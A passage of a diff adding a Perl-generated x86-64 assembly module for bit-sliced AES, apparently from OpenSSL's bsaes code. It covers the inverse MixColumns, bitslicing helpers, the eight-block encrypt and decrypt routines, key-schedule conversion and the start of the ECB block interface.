+	pxor	@y[0], @y[1]
+	pxor	@t[0], @y[0]
+	pxor	@t[1], @y[1]
+	pshufd	\$0x93, @t[2], @t[2]
+	pxor	@t[5], @y[0]
+	pxor	@t[6], @y[1]
+	pxor	@t[7], @y[0]
+	pshufd	\$0x93, @t[4], @t[4]
+	pxor	@t[6], @t[7]		# clobber t[7]
+	pxor	@y[0], @y[1]
+
+	pxor	@t[0], @y[3]
+	pshufd	\$0x93, @t[0], @t[0]
+	pxor	@t[1], @y[2]
+	pxor	@t[1], @y[4]
+	pxor	@t[2], @y[2]
+	pshufd	\$0x93, @t[1], @t[1]
+	pxor	@t[2], @y[3]
+	pxor	@t[2], @y[5]
+	pxor	@t[7], @y[2]
+	pshufd	\$0x93, @t[2], @t[2]
+	pxor	@t[3], @y[3]
+	pxor	@t[3], @y[6]
+	pxor	@t[3], @y[4]
+	pshufd	\$0x93, @t[3], @t[3]
+	pxor	@t[4], @y[7]
+	pxor	@t[4], @y[5]
+	pxor	@t[7], @y[7]
+	pxor	@t[5], @y[3]
+	pxor	@t[4], @y[4]
+	pxor	@t[5], @t[7]		# clobber t[7] even more
+
+	pxor	@t[7], @y[5]
+	pshufd	\$0x93, @t[4], @t[4]
+	pxor	@t[7], @y[6]
+	pxor	@t[7], @y[4]
+
+	pxor	@t[5], @t[7]
+	pshufd	\$0x93, @t[5], @t[5]
+	pxor	@t[6], @t[7]		# restore t[7]
+
+	# multiplication by 0x0d
+	pxor	@y[7], @y[4]
+	pxor	@t[4], @y[7]
+	pshufd	\$0x93, @t[6], @t[6]
+	pxor	@t[0], @y[2]
+	pxor	@t[5], @y[7]
+	pxor	@t[2], @y[2]
+	pshufd	\$0x93, @t[7], @t[7]
+
+	pxor	@y[1], @y[3]
+	pxor	@t[1], @y[1]
+	pxor	@t[0], @y[0]
+	pxor	@t[0], @y[3]
+	pxor	@t[5], @y[1]
+	pxor	@t[5], @y[0]
+	pxor	@t[7], @y[1]
+	pshufd	\$0x93, @t[0], @t[0]
+	pxor	@t[6], @y[0]
+	pxor	@y[1], @y[3]
+	pxor	@t[1], @y[4]
+	pshufd	\$0x93, @t[1], @t[1]
+
+	pxor	@t[7], @y[7]
+	pxor	@t[2], @y[4]
+	pxor	@t[2], @y[5]
+	pshufd	\$0x93, @t[2], @t[2]
+	pxor	@t[6], @y[2]
+	pxor	@t[3], @t[6]		# clobber t[6]
+	pxor	@y[7], @y[4]
+	pxor	@t[6], @y[3]
+
+	pxor	@t[6], @y[6]
+	pxor	@t[5], @y[5]
+	pxor	@t[4], @y[6]
+	pshufd	\$0x93, @t[4], @t[4]
+	pxor	@t[6], @y[5]
+	pxor	@t[7], @y[6]
+	pxor	@t[3], @t[6]		# restore t[6]
+
+	pshufd	\$0x93, @t[5], @t[5]
+	pshufd	\$0x93, @t[6], @t[6]
+	pshufd	\$0x93, @t[7], @t[7]
+	pshufd	\$0x93, @t[3], @t[3]
+
+	# multiplication by 0x09
+	pxor	@y[1], @y[4]
+	pxor	@y[1], @t[1]		# t[1]=y[1]
+	pxor	@t[5], @t[0]		# clobber t[0]
+	pxor	@t[5], @t[1]
+	pxor	@t[0], @y[3]
+	pxor	@y[0], @t[0]		# t[0]=y[0]
+	pxor	@t[6], @t[1]
+	pxor	@t[7], @t[6]		# clobber t[6]
+	pxor	@t[1], @y[4]
+	pxor	@t[4], @y[7]
+	pxor	@y[4], @t[4]		# t[4]=y[4]
+	pxor	@t[3], @y[6]
+	pxor	@y[3], @t[3]		# t[3]=y[3]
+	pxor	@t[2], @y[5]
+	pxor	@y[2], @t[2]		# t[2]=y[2]
+	pxor	@t[7], @t[3]
+	pxor	@y[5], @t[5]		# t[5]=y[5]
+	pxor	@t[6], @t[2]
+	pxor	@t[6], @t[5]
+	pxor	@y[6], @t[6]		# t[6]=y[6]
+	pxor	@y[7], @t[7]		# t[7]=y[7]
+
+	movdqa	@t[0],@XMM[0]
+	movdqa	@t[1],@XMM[1]
+	movdqa	@t[2],@XMM[2]
+	movdqa	@t[3],@XMM[3]
+	movdqa	@t[4],@XMM[4]
+	movdqa	@t[5],@XMM[5]
+	movdqa	@t[6],@XMM[6]
+	movdqa	@t[7],@XMM[7]
+___
+}
+
+sub InvMixColumns {
+my @x=@_[0..7];
+my @t=@_[8..15];
+
+# Thanks to Jussi Kivilinna for providing pointer to
+#
+# | 0e 0b 0d 09 |   | 02 03 01 01 |   | 05 00 04 00 |
+# | 09 0e 0b 0d | = | 01 02 03 01 | x | 00 05 00 04 |
+# | 0d 09 0e 0b |   | 01 01 02 03 |   | 04 00 05 00 |
+# | 0b 0d 09 0e |   | 03 01 01 02 |   | 00 04 00 05 |
+
+$code.=<<___;
+	# multiplication by 0x05-0x00-0x04-0x00
+	pshufd	\$0x4E, @x[0], @t[0]
+	pshufd	\$0x4E, @x[6], @t[6]
+	pxor	@x[0], @t[0]
+	pshufd	\$0x4E, @x[7], @t[7]
+	pxor	@x[6], @t[6]
+	pshufd	\$0x4E, @x[1], @t[1]
+	pxor	@x[7], @t[7]
+	pshufd	\$0x4E, @x[2], @t[2]
+	pxor	@x[1], @t[1]
+	pshufd	\$0x4E, @x[3], @t[3]
+	pxor	@x[2], @t[2]
+	 pxor	@t[6], @x[0]
+	 pxor	@t[6], @x[1]
+	pshufd	\$0x4E, @x[4], @t[4]
+	pxor	@x[3], @t[3]
+	 pxor	@t[0], @x[2]
+	 pxor	@t[1], @x[3]
+	pshufd	\$0x4E, @x[5], @t[5]
+	pxor	@x[4], @t[4]
+	 pxor	@t[7], @x[1]
+	 pxor	@t[2], @x[4]
+	pxor	@x[5], @t[5]
+
+	 pxor	@t[7], @x[2]
+	 pxor	@t[6], @x[3]
+	 pxor	@t[6], @x[4]
+	 pxor	@t[3], @x[5]
+	 pxor	@t[4], @x[6]
+	 pxor	@t[7], @x[4]
+	 pxor	@t[7], @x[5]
+	 pxor	@t[5], @x[7]
+___
+	&MixColumns	(@x,@t,1);	# flipped 2<->3 and 4<->6
+}
+
+sub aesenc {				# not used
+my @b=@_[0..7];
+my @t=@_[8..15];
+$code.=<<___;
+	movdqa	0x30($const),@t[0]	# .LSR
+___
+	&ShiftRows	(@b,@t[0]);
+	&Sbox		(@b,@t);
+	&MixColumns	(@b[0,1,4,6,3,7,2,5],@t);
+}
+
+sub aesenclast {			# not used
+my @b=@_[0..7];
+my @t=@_[8..15];
+$code.=<<___;
+	movdqa	0x40($const),@t[0]	# .LSRM0
+___
+	&ShiftRows	(@b,@t[0]);
+	&Sbox		(@b,@t);
+$code.=<<___
+	pxor	0x00($key),@b[0]
+	pxor	0x10($key),@b[1]
+	pxor	0x20($key),@b[4]
+	pxor	0x30($key),@b[6]
+	pxor	0x40($key),@b[3]
+	pxor	0x50($key),@b[7]
+	pxor	0x60($key),@b[2]
+	pxor	0x70($key),@b[5]
+___
+}
+
+sub swapmove {
+my ($a,$b,$n,$mask,$t)=@_;
+$code.=<<___;
+	movdqa	$b,$t
+	psrlq	\$$n,$b
+	pxor  	$a,$b
+	pand	$mask,$b
+	pxor	$b,$a
+	psllq	\$$n,$b
+	pxor	$t,$b
+___
+}
+sub swapmove2x {
+my ($a0,$b0,$a1,$b1,$n,$mask,$t0,$t1)=@_;
+$code.=<<___;
+	movdqa	$b0,$t0
+	psrlq	\$$n,$b0
+	 movdqa	$b1,$t1
+	 psrlq	\$$n,$b1
+	pxor  	$a0,$b0
+	 pxor  	$a1,$b1
+	pand	$mask,$b0
+	 pand	$mask,$b1
+	pxor	$b0,$a0
+	psllq	\$$n,$b0
+	 pxor	$b1,$a1
+	 psllq	\$$n,$b1
+	pxor	$t0,$b0
+	 pxor	$t1,$b1
+___
+}
+
+sub bitslice {
+my @x=reverse(@_[0..7]);
+my ($t0,$t1,$t2,$t3)=@_[8..11];
+$code.=<<___;
+	movdqa	0x00($const),$t0	# .LBS0
+	movdqa	0x10($const),$t1	# .LBS1
+___
+	&swapmove2x(@x[0,1,2,3],1,$t0,$t2,$t3);
+	&swapmove2x(@x[4,5,6,7],1,$t0,$t2,$t3);
+$code.=<<___;
+	movdqa	0x20($const),$t0	# .LBS2
+___
+	&swapmove2x(@x[0,2,1,3],2,$t1,$t2,$t3);
+	&swapmove2x(@x[4,6,5,7],2,$t1,$t2,$t3);
+
+	&swapmove2x(@x[0,4,1,5],4,$t0,$t2,$t3);
+	&swapmove2x(@x[2,6,3,7],4,$t0,$t2,$t3);
+}
+
+$code.=<<___;
+.text
+
+.extern	asm_AES_encrypt
+.extern	asm_AES_decrypt
+
+.type	_bsaes_encrypt8,\@abi-omnipotent
+.align	64
+_bsaes_encrypt8:
+	lea	.LBS0(%rip), $const	# constants table
+
+	movdqa	($key), @XMM[9]		# round 0 key
+	lea	0x10($key), $key
+	movdqa	0x50($const), @XMM[8]	# .LM0SR
+	pxor	@XMM[9], @XMM[0]	# xor with round0 key
+	pxor	@XMM[9], @XMM[1]
+	pxor	@XMM[9], @XMM[2]
+	pxor	@XMM[9], @XMM[3]
+	 pshufb	@XMM[8], @XMM[0]
+	 pshufb	@XMM[8], @XMM[1]
+	pxor	@XMM[9], @XMM[4]
+	pxor	@XMM[9], @XMM[5]
+	 pshufb	@XMM[8], @XMM[2]
+	 pshufb	@XMM[8], @XMM[3]
+	pxor	@XMM[9], @XMM[6]
+	pxor	@XMM[9], @XMM[7]
+	 pshufb	@XMM[8], @XMM[4]
+	 pshufb	@XMM[8], @XMM[5]
+	 pshufb	@XMM[8], @XMM[6]
+	 pshufb	@XMM[8], @XMM[7]
+_bsaes_encrypt8_bitslice:
+___
+	&bitslice	(@XMM[0..7, 8..11]);
+$code.=<<___;
+	dec	$rounds
+	jmp	.Lenc_sbox
+.align	16
+.Lenc_loop:
+___
+	&ShiftRows	(@XMM[0..7, 8]);
+$code.=".Lenc_sbox:\n";
+	&Sbox		(@XMM[0..7, 8..15]);
+$code.=<<___;
+	dec	$rounds
+	jl	.Lenc_done
+___
+	&MixColumns	(@XMM[0,1,4,6,3,7,2,5, 8..15]);
+$code.=<<___;
+	movdqa	0x30($const), @XMM[8]	# .LSR
+	jnz	.Lenc_loop
+	movdqa	0x40($const), @XMM[8]	# .LSRM0
+	jmp	.Lenc_loop
+.align	16
+.Lenc_done:
+___
+	# output in lsb > [t0, t1, t4, t6, t3, t7, t2, t5] < msb
+	&bitslice	(@XMM[0,1,4,6,3,7,2,5, 8..11]);
+$code.=<<___;
+	movdqa	($key), @XMM[8]		# last round key
+	pxor	@XMM[8], @XMM[4]
+	pxor	@XMM[8], @XMM[6]
+	pxor	@XMM[8], @XMM[3]
+	pxor	@XMM[8], @XMM[7]
+	pxor	@XMM[8], @XMM[2]
+	pxor	@XMM[8], @XMM[5]
+	pxor	@XMM[8], @XMM[0]
+	pxor	@XMM[8], @XMM[1]
+	ret
+.size	_bsaes_encrypt8,.-_bsaes_encrypt8
+
+.type	_bsaes_decrypt8,\@abi-omnipotent
+.align	64
+_bsaes_decrypt8:
+	lea	.LBS0(%rip), $const	# constants table
+
+	movdqa	($key), @XMM[9]		# round 0 key
+	lea	0x10($key), $key
+	movdqa	-0x30($const), @XMM[8]	# .LM0ISR
+	pxor	@XMM[9], @XMM[0]	# xor with round0 key
+	pxor	@XMM[9], @XMM[1]
+	pxor	@XMM[9], @XMM[2]
+	pxor	@XMM[9], @XMM[3]
+	 pshufb	@XMM[8], @XMM[0]
+	 pshufb	@XMM[8], @XMM[1]
+	pxor	@XMM[9], @XMM[4]
+	pxor	@XMM[9], @XMM[5]
+	 pshufb	@XMM[8], @XMM[2]
+	 pshufb	@XMM[8], @XMM[3]
+	pxor	@XMM[9], @XMM[6]
+	pxor	@XMM[9], @XMM[7]
+	 pshufb	@XMM[8], @XMM[4]
+	 pshufb	@XMM[8], @XMM[5]
+	 pshufb	@XMM[8], @XMM[6]
+	 pshufb	@XMM[8], @XMM[7]
+___
+	&bitslice	(@XMM[0..7, 8..11]);
+$code.=<<___;
+	dec	$rounds
+	jmp	.Ldec_sbox
+.align	16
+.Ldec_loop:
+___
+	&ShiftRows	(@XMM[0..7, 8]);
+$code.=".Ldec_sbox:\n";
+	&InvSbox	(@XMM[0..7, 8..15]);
+$code.=<<___;
+	dec	$rounds
+	jl	.Ldec_done
+___
+	&InvMixColumns	(@XMM[0,1,6,4,2,7,3,5, 8..15]);
+$code.=<<___;
+	movdqa	-0x10($const), @XMM[8]	# .LISR
+	jnz	.Ldec_loop
+	movdqa	-0x20($const), @XMM[8]	# .LISRM0
+	jmp	.Ldec_loop
+.align	16
+.Ldec_done:
+___
+	&bitslice	(@XMM[0,1,6,4,2,7,3,5, 8..11]);
+$code.=<<___;
+	movdqa	($key), @XMM[8]		# last round key
+	pxor	@XMM[8], @XMM[6]
+	pxor	@XMM[8], @XMM[4]
+	pxor	@XMM[8], @XMM[2]
+	pxor	@XMM[8], @XMM[7]
+	pxor	@XMM[8], @XMM[3]
+	pxor	@XMM[8], @XMM[5]
+	pxor	@XMM[8], @XMM[0]
+	pxor	@XMM[8], @XMM[1]
+	ret
+.size	_bsaes_decrypt8,.-_bsaes_decrypt8
+___
+}
+{
+my ($out,$inp,$rounds,$const)=("%rax","%rcx","%r10d","%r11");
+
+sub bitslice_key {
+my @x=reverse(@_[0..7]);
+my ($bs0,$bs1,$bs2,$t2,$t3)=@_[8..12];
+
+	&swapmove	(@x[0,1],1,$bs0,$t2,$t3);
+$code.=<<___;
+	#&swapmove(@x[2,3],1,$t0,$t2,$t3);
+	movdqa	@x[0], @x[2]
+	movdqa	@x[1], @x[3]
+___
+	#&swapmove2x(@x[4,5,6,7],1,$t0,$t2,$t3);
+
+	&swapmove2x	(@x[0,2,1,3],2,$bs1,$t2,$t3);
+$code.=<<___;
+	#&swapmove2x(@x[4,6,5,7],2,$t1,$t2,$t3);
+	movdqa	@x[0], @x[4]
+	movdqa	@x[2], @x[6]
+	movdqa	@x[1], @x[5]
+	movdqa	@x[3], @x[7]
+___
+	&swapmove2x	(@x[0,4,1,5],4,$bs2,$t2,$t3);
+	&swapmove2x	(@x[2,6,3,7],4,$bs2,$t2,$t3);
+}
+
+$code.=<<___;
+.type	_bsaes_key_convert,\@abi-omnipotent
+.align	16
+_bsaes_key_convert:
+	lea	.Lmasks(%rip), $const
+	movdqu	($inp), %xmm7		# load round 0 key
+	lea	0x10($inp), $inp
+	movdqa	0x00($const), %xmm0	# 0x01...
+	movdqa	0x10($const), %xmm1	# 0x02...
+	movdqa	0x20($const), %xmm2	# 0x04...
+	movdqa	0x30($const), %xmm3	# 0x08...
+	movdqa	0x40($const), %xmm4	# .LM0
+	pcmpeqd	%xmm5, %xmm5		# .LNOT
+
+	movdqu	($inp), %xmm6		# load round 1 key
+	movdqa	%xmm7, ($out)		# save round 0 key
+	lea	0x10($out), $out
+	dec	$rounds
+	jmp	.Lkey_loop
+.align	16
+.Lkey_loop:
+	pshufb	%xmm4, %xmm6		# .LM0
+
+	movdqa	%xmm0,	%xmm8
+	movdqa	%xmm1,	%xmm9
+
+	pand	%xmm6,	%xmm8
+	pand	%xmm6,	%xmm9
+	movdqa	%xmm2,	%xmm10
+	pcmpeqb	%xmm0,	%xmm8
+	psllq	\$4,	%xmm0		# 0x10...
+	movdqa	%xmm3,	%xmm11
+	pcmpeqb	%xmm1,	%xmm9
+	psllq	\$4,	%xmm1		# 0x20...
+
+	pand	%xmm6,	%xmm10
+	pand	%xmm6,	%xmm11
+	movdqa	%xmm0,	%xmm12
+	pcmpeqb	%xmm2,	%xmm10
+	psllq	\$4,	%xmm2		# 0x40...
+	movdqa	%xmm1,	%xmm13
+	pcmpeqb	%xmm3,	%xmm11
+	psllq	\$4,	%xmm3		# 0x80...
+
+	movdqa	%xmm2,	%xmm14
+	movdqa	%xmm3,	%xmm15
+	 pxor	%xmm5,	%xmm8		# "pnot"
+	 pxor	%xmm5,	%xmm9
+
+	pand	%xmm6,	%xmm12
+	pand	%xmm6,	%xmm13
+	 movdqa	%xmm8, 0x00($out)	# write bit-sliced round key
+	pcmpeqb	%xmm0,	%xmm12
+	psrlq	\$4,	%xmm0		# 0x01...
+	 movdqa	%xmm9, 0x10($out)
+	pcmpeqb	%xmm1,	%xmm13
+	psrlq	\$4,	%xmm1		# 0x02...
+	 lea	0x10($inp), $inp
+
+	pand	%xmm6,	%xmm14
+	pand	%xmm6,	%xmm15
+	 movdqa	%xmm10, 0x20($out)
+	pcmpeqb	%xmm2,	%xmm14
+	psrlq	\$4,	%xmm2		# 0x04...
+	 movdqa	%xmm11, 0x30($out)
+	pcmpeqb	%xmm3,	%xmm15
+	psrlq	\$4,	%xmm3		# 0x08...
+	 movdqu	($inp), %xmm6		# load next round key
+
+	pxor	%xmm5, %xmm13		# "pnot"
+	pxor	%xmm5, %xmm14
+	movdqa	%xmm12, 0x40($out)
+	movdqa	%xmm13, 0x50($out)
+	movdqa	%xmm14, 0x60($out)
+	movdqa	%xmm15, 0x70($out)
+	lea	0x80($out),$out
+	dec	$rounds
+	jnz	.Lkey_loop
+
+	movdqa	0x50($const), %xmm7	# .L63
+	#movdqa	%xmm6, ($out)		# don't save last round key
+	ret
+.size	_bsaes_key_convert,.-_bsaes_key_convert
+___
+}
+
+if (0 && !$win64) {	# following four functions are unsupported interface
+			# used for benchmarking...
+$code.=<<___;
+.globl	bsaes_enc_key_convert
+.type	bsaes_enc_key_convert,\@function,2
+.align	16
+bsaes_enc_key_convert:
+	mov	240($inp),%r10d		# pass rounds
+	mov	$inp,%rcx		# pass key
+	mov	$out,%rax		# pass key schedule
+	call	_bsaes_key_convert
+	pxor	%xmm6,%xmm7		# fix up last round key
+	movdqa	%xmm7,(%rax)		# save last round key
+	ret
+.size	bsaes_enc_key_convert,.-bsaes_enc_key_convert
+
+.globl	bsaes_encrypt_128
+.type	bsaes_encrypt_128,\@function,4
+.align	16
+bsaes_encrypt_128:
+.Lenc128_loop:
+	movdqu	0x00($inp), @XMM[0]	# load input
+	movdqu	0x10($inp), @XMM[1]
+	movdqu	0x20($inp), @XMM[2]
+	movdqu	0x30($inp), @XMM[3]
+	movdqu	0x40($inp), @XMM[4]
+	movdqu	0x50($inp), @XMM[5]
+	movdqu	0x60($inp), @XMM[6]
+	movdqu	0x70($inp), @XMM[7]
+	mov	$key, %rax		# pass the $key
+	lea	0x80($inp), $inp
+	mov	\$10,%r10d
+
+	call	_bsaes_encrypt8
+
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[4], 0x20($out)
+	movdqu	@XMM[6], 0x30($out)
+	movdqu	@XMM[3], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[2], 0x60($out)
+	movdqu	@XMM[5], 0x70($out)
+	lea	0x80($out), $out
+	sub	\$0x80,$len
+	ja	.Lenc128_loop
+	ret
+.size	bsaes_encrypt_128,.-bsaes_encrypt_128
+
+.globl	bsaes_dec_key_convert
+.type	bsaes_dec_key_convert,\@function,2
+.align	16
+bsaes_dec_key_convert:
+	mov	240($inp),%r10d		# pass rounds
+	mov	$inp,%rcx		# pass key
+	mov	$out,%rax		# pass key schedule
+	call	_bsaes_key_convert
+	pxor	($out),%xmm7		# fix up round 0 key
+	movdqa	%xmm6,(%rax)		# save last round key
+	movdqa	%xmm7,($out)
+	ret
+.size	bsaes_dec_key_convert,.-bsaes_dec_key_convert
+
+.globl	bsaes_decrypt_128
+.type	bsaes_decrypt_128,\@function,4
+.align	16
+bsaes_decrypt_128:
+.Ldec128_loop:
+	movdqu	0x00($inp), @XMM[0]	# load input
+	movdqu	0x10($inp), @XMM[1]
+	movdqu	0x20($inp), @XMM[2]
+	movdqu	0x30($inp), @XMM[3]
+	movdqu	0x40($inp), @XMM[4]
+	movdqu	0x50($inp), @XMM[5]
+	movdqu	0x60($inp), @XMM[6]
+	movdqu	0x70($inp), @XMM[7]
+	mov	$key, %rax		# pass the $key
+	lea	0x80($inp), $inp
+	mov	\$10,%r10d
+
+	call	_bsaes_decrypt8
+
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[3], 0x60($out)
+	movdqu	@XMM[5], 0x70($out)
+	lea	0x80($out), $out
+	sub	\$0x80,$len
+	ja	.Ldec128_loop
+	ret
+.size	bsaes_decrypt_128,.-bsaes_decrypt_128
+___
+}
+{
+######################################################################
+#
+# OpenSSL interface
+#
+my ($arg1,$arg2,$arg3,$arg4,$arg5,$arg6)=$win64	? ("%rcx","%rdx","%r8","%r9","%r10","%r11d")
+						: ("%rdi","%rsi","%rdx","%rcx","%r8","%r9d");
+my ($inp,$out,$len,$key)=("%r12","%r13","%r14","%r15");
+
+if ($ecb) {
+$code.=<<___;
+.globl	bsaes_ecb_encrypt_blocks
+.type	bsaes_ecb_encrypt_blocks,\@abi-omnipotent
+.align	16
+bsaes_ecb_encrypt_blocks:
+	mov	%rsp, %rax
+.Lecb_enc_prologue:
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	-0x48(%rsp),%rsp
+___
+$code.=<<___ if ($win64);
+	lea	-0xa0(%rsp), %rsp
+	movaps	%xmm6, 0x40(%rsp)
+	movaps	%xmm7, 0x50(%rsp)
+	movaps	%xmm8, 0x60(%rsp)
+	movaps	%xmm9, 0x70(%rsp)
+	movaps	%xmm10, 0x80(%rsp)
+	movaps	%xmm11, 0x90(%rsp)
+	movaps	%xmm12, 0xa0(%rsp)
+	movaps	%xmm13, 0xb0(%rsp)
+	movaps	%xmm14, 0xc0(%rsp)
+	movaps	%xmm15, 0xd0(%rsp)
+.Lecb_enc_body:
+___
+$code.=<<___;
+	mov	%rsp,%rbp		# backup %rsp
+	mov	240($arg4),%eax		# rounds
+	mov	$arg1,$inp		# backup arguments
+	mov	$arg2,$out
+	mov	$arg3,$len
+	mov	$arg4,$key
+	cmp	\$8,$arg3
+	jb	.Lecb_enc_short
+
+	mov	%eax,%ebx		# backup rounds
+	shl	\$7,%rax		# 128 bytes per inner round key
+	sub	\$`128-32`,%rax		# size of bit-sliced key schedule
+	sub	%rax,%rsp
+	mov	%rsp,%rax		# pass key schedule
+	mov	$key,%rcx		# pass key
+	mov	%ebx,%r10d		# pass rounds
+	call	_bsaes_key_convert
+	pxor	%xmm6,%xmm7		# fix up last round key
+	movdqa	%xmm7,(%rax)		# save last round key
+
+	sub	\$8,$len
+.Lecb_enc_loop:
+	movdqu	0x00($inp), @XMM[0]	# load input
+	movdqu	0x10($inp), @XMM[1]
+	movdqu	0x20($inp), @XMM[2]
+	movdqu	0x30($inp), @XMM[3]
+	movdqu	0x40($inp), @XMM[4]
+	movdqu	0x50($inp), @XMM[5]
+	mov	%rsp, %rax		# pass key schedule
+	movdqu	0x60($inp), @XMM[6]
+	mov	%ebx,%r10d		# pass rounds
+	movdqu	0x70($inp), @XMM[7]
+	lea	0x80($inp), $inp
+
+	call	_bsaes_encrypt8
+
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[4], 0x20($out)
+	movdqu	@XMM[6], 0x30($out)
+	movdqu	@XMM[3], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[2], 0x60($out)
+	movdqu	@XMM[5], 0x70($out)
+	lea	0x80($out), $out
+	sub	\$8,$len
+	jnc	.Lecb_enc_loop
+
+	add	\$8,$len
+	jz	.Lecb_enc_done
+
+	movdqu	0x00($inp), @XMM[0]	# load input
+	mov	%rsp, %rax		# pass key schedule
+	mov	%ebx,%r10d		# pass rounds
+	cmp	\$2,$len
+	jb	.Lecb_enc_one
+	movdqu	0x10($inp), @XMM[1]
+	je	.Lecb_enc_two
+	movdqu	0x20($inp), @XMM[2]
+	cmp	\$4,$len
+	jb	.Lecb_enc_three
+	movdqu	0x30($inp), @XMM[3]
+	je	.Lecb_enc_four
+	movdqu	0x40($inp), @XMM[4]
+	cmp	\$6,$len
+	jb	.Lecb_enc_five
+	movdqu	0x50($inp), @XMM[5]
+	je	.Lecb_enc_six
+	movdqu	0x60($inp), @XMM[6]
+	call	_bsaes_encrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[4], 0x20($out)
+	movdqu	@XMM[6], 0x30($out)
+	movdqu	@XMM[3], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[2], 0x60($out)
+	jmp	.Lecb_enc_done
+.align	16
+.Lecb_enc_six:
+	call	_bsaes_encrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[4], 0x20($out)
+	movdqu	@XMM[6], 0x30($out)
+	movdqu	@XMM[3], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	jmp	.Lecb_enc_done
+.align	16
+.Lecb_enc_five:
+	call	_bsaes_encrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[4], 0x20($out)
+	movdqu	@XMM[6], 0x30($out)
+	movdqu	@XMM[3], 0x40($out)
+	jmp	.Lecb_enc_done
+.align	16
+.Lecb_enc_four:
+	call	_bsaes_encrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[4], 0x20($out)
+	movdqu	@XMM[6], 0x30($out)
+	jmp	.Lecb_enc_done
+.align	16
+.Lecb_enc_three:
+	call	_bsaes_encrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[4], 0x20($out)
+	jmp	.Lecb_enc_done
+.align	16
+.Lecb_enc_two:
+	call	_bsaes_encrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	jmp	.Lecb_enc_done
+.align	16
+.Lecb_enc_one:
+	call	_bsaes_encrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	jmp	.Lecb_enc_done
+.align	16
+.Lecb_enc_short:
+	lea	($inp), $arg1
+	lea	($out), $arg2
+	lea	($key), $arg3
+	call	asm_AES_encrypt
+	lea	16($inp), $inp
+	lea	16($out), $out
+	dec	$len
+	jnz	.Lecb_enc_short
+
+.Lecb_enc_done:
+	lea	(%rsp),%rax
+	pxor	%xmm0, %xmm0
+.Lecb_enc_bzero:			# wipe key schedule [if any]
+	movdqa	%xmm0, 0x00(%rax)
+	movdqa	%xmm0, 0x10(%rax)
+	lea	0x20(%rax), %rax
+	cmp	%rax, %rbp
+	jb	.Lecb_enc_bzero
+
+	lea	(%rbp),%rsp		# restore %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	0x40(%rbp), %xmm6
+	movaps	0x50(%rbp), %xmm7
+	movaps	0x60(%rbp), %xmm8
+	movaps	0x70(%rbp), %xmm9
+	movaps	0x80(%rbp), %xmm10
+	movaps	0x90(%rbp), %xmm11
+	movaps	0xa0(%rbp), %xmm12
+	movaps	0xb0(%rbp), %xmm13
+	movaps	0xc0(%rbp), %xmm14
+	movaps	0xd0(%rbp), %xmm15
+	lea	0xa0(%rbp), %rsp
+___
+$code.=<<___;
+	mov	0x48(%rsp), %r15
+	mov	0x50(%rsp), %r14
+	mov	0x58(%rsp), %r13
+	mov	0x60(%rsp), %r12
+	mov	0x68(%rsp), %rbx
+	mov	0x70(%rsp), %rax
+	lea	0x78(%rsp), %rsp
+	mov	%rax, %rbp
+.Lecb_enc_epilogue:
+	ret
+.size	bsaes_ecb_encrypt_blocks,.-bsaes_ecb_encrypt_blocks
+
+.globl	bsaes_ecb_decrypt_blocks
+.type	bsaes_ecb_decrypt_blocks,\@abi-omnipotent
+.align	16
+bsaes_ecb_decrypt_blocks:
+	mov	%rsp, %rax
+.Lecb_dec_prologue:
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	-0x48(%rsp),%rsp
+___
+$code.=<<___ if ($win64);
+	lea	-0xa0(%rsp), %rsp
+	movaps	%xmm6, 0x40(%rsp)
+	movaps	%xmm7, 0x50(%rsp)
+	movaps	%xmm8, 0x60(%rsp)
+	movaps	%xmm9, 0x70(%rsp)
+	movaps	%xmm10, 0x80(%rsp)
+	movaps	%xmm11, 0x90(%rsp)
+	movaps	%xmm12, 0xa0(%rsp)
+	movaps	%xmm13, 0xb0(%rsp)
+	movaps	%xmm14, 0xc0(%rsp)
+	movaps	%xmm15, 0xd0(%rsp)
+.Lecb_dec_body:
+___
+$code.=<<___;
+	mov	%rsp,%rbp		# backup %rsp
+	mov	240($arg4),%eax		# rounds
+	mov	$arg1,$inp		# backup arguments
+	mov	$arg2,$out
+	mov	$arg3,$len
+	mov	$arg4,$key
+	cmp	\$8,$arg3
+	jb	.Lecb_dec_short
+
+	mov	%eax,%ebx		# backup rounds
+	shl	\$7,%rax		# 128 bytes per inner round key
+	sub	\$`128-32`,%rax		# size of bit-sliced key schedule
+	sub	%rax,%rsp
+	mov	%rsp,%rax		# pass key schedule
+	mov	$key,%rcx		# pass key
+	mov	%ebx,%r10d		# pass rounds
+	call	_bsaes_key_convert
+	pxor	(%rsp),%xmm7		# fix up 0 round key
+	movdqa	%xmm6,(%rax)		# save last round key
+	movdqa	%xmm7,(%rsp)
+
+	sub	\$8,$len
+.Lecb_dec_loop:
+	movdqu	0x00($inp), @XMM[0]	# load input
+	movdqu	0x10($inp), @XMM[1]
+	movdqu	0x20($inp), @XMM[2]
